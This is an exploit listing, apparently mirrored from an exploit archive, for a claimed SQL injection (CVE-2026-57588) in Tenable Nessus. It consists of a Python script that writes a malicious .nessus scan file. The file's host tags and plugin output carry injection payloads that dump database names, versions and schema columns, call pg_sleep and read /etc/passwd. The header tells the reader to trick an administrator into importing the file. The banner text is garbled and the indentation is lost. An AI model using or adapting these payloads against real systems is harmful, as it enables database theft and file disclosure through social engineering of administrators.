Share
## https://sploitus.com/exploit?id=PACKETSTORM:225259
# Exploit Title: Tenable Nessus 10.12.1 - SQL Injection
# CVE: CVE-2026-57588
# Date: 2026-06-26
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://www.tenable.com
# Software Link: https://www.tenable.com/downloads/nessus
# Affected: Nessus 10.12.0 and prior
# Tested on: Nessus 10.12.0
# Category: Remote
# Platform: Linux / Windows
# Exploit Type: SQL Injection
# CVSS: 4.3 (Medium)
# Description: A SQL injection vulnerability exists in Tenable Nessus when importing malicious scan result files (.nessus XML).
# Successful exploitation allows data exfiltration from the backend database by a privileged user.
# Fixed in: Nessus 10.12.1 and later
# Usage:
# python3 exploit.py -o malicious.nessus
#
# Examples:
# python3 exploit.py
# python3 exploit.py --output poc.nessus
#
# Options:
# -o, --output Output filename for the malicious .nessus file
#
# Notes:
# โข This is a Proof of Concept. Requires social engineering to trick a privileged user into importing the file.
# โข Works best against PostgreSQL backend (default in Nessus).
#
# How to Use
#
# Step 1:
# Generate the malicious file using this script.
#
# Step 2:
# Deliver the .nessus file to a Nessus administrator and have them import it via the web interface.
def banner():
print(r"""
โโโโโโโโ โโโโโโ โโโโ โโโโโโ โโโ โโโโโโ โโโโ โโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโโโโโโโ โโโโโโ โโโโโโ โโโ โโโ โโโโโโ โโโ โโโโโโโโโโโโโโ โโโ
โโโโโโโ โโโ โโโโโโ โโโโโ โโโ โโโ โโโโโโ โโโโโโโโโโโโโโ โโโ
โโโ Banyamer Security โโโ
""")
import argparse
import xml.etree.ElementTree as ET
def create_malicious_nessus(output_file):
root = ET.Element("NessusClientData_v2")
report = ET.SubElement(root, "Report")
report.set("name", "PoC - CVE-2026-57588")
host = ET.SubElement(report, "ReportHost")
host.set("name", "poc-target.example.com")
host_properties = ET.SubElement(host, "HostProperties")
tags = [
("hostname", "evil-host' UNION SELECT NULL, current_database(), version(), user() -- "),
("os", "Linux' AND (SELECT pg_sleep(5))=0 -- "),
("ip", "192.168.1.1' OR '1'='1"),
("fqdn", "test' ; SELECT pg_read_file('/etc/passwd') -- "),
]
for name, value in tags:
tag = ET.SubElement(host_properties, "tag")
tag.set("name", name)
tag.text = value
item = ET.SubElement(host, "ReportItem")
ET.SubElement(item, "pluginID").text = "999999"
ET.SubElement(item, "pluginName").text = "CVE-2026-57588 PoC"
ET.SubElement(item, "port").text = "0"
ET.SubElement(item, "protocol").text = "tcp"
ET.SubElement(item, "severity").text = "0"
ET.SubElement(item, "description").text = "Proof of Concept for SQL Injection"
plugin_output = ET.SubElement(item, "plugin_output")
plugin_output.text = """Normal output
' UNION ALL SELECT
'=== DATA EXFIL START ===',
table_name,
column_name,
'=== DATA EXFIL END ==='
FROM information_schema.columns
WHERE table_schema = current_schema() -- """
tree = ET.ElementTree(root)
with open(output_file, "wb") as f:
tree.write(f, encoding="utf-8", xml_declaration=True)
print(f"[+] Malicious file successfully created: {output_file}")
print("[+] Deliver this file to a privileged Nessus user for import.")
def main():
banner()
parser = argparse.ArgumentParser(description="CVE-2026-57588 Nessus SQLi PoC")
parser.add_argument("-o", "--output", default="cve-2026-57588-poc.nessus", help="Output filename (default: cve-2026-57588-poc.nessus)")
args = parser.parse_args()
create_malicious_nessus(args.output)
if __name__ == "__main__":
main()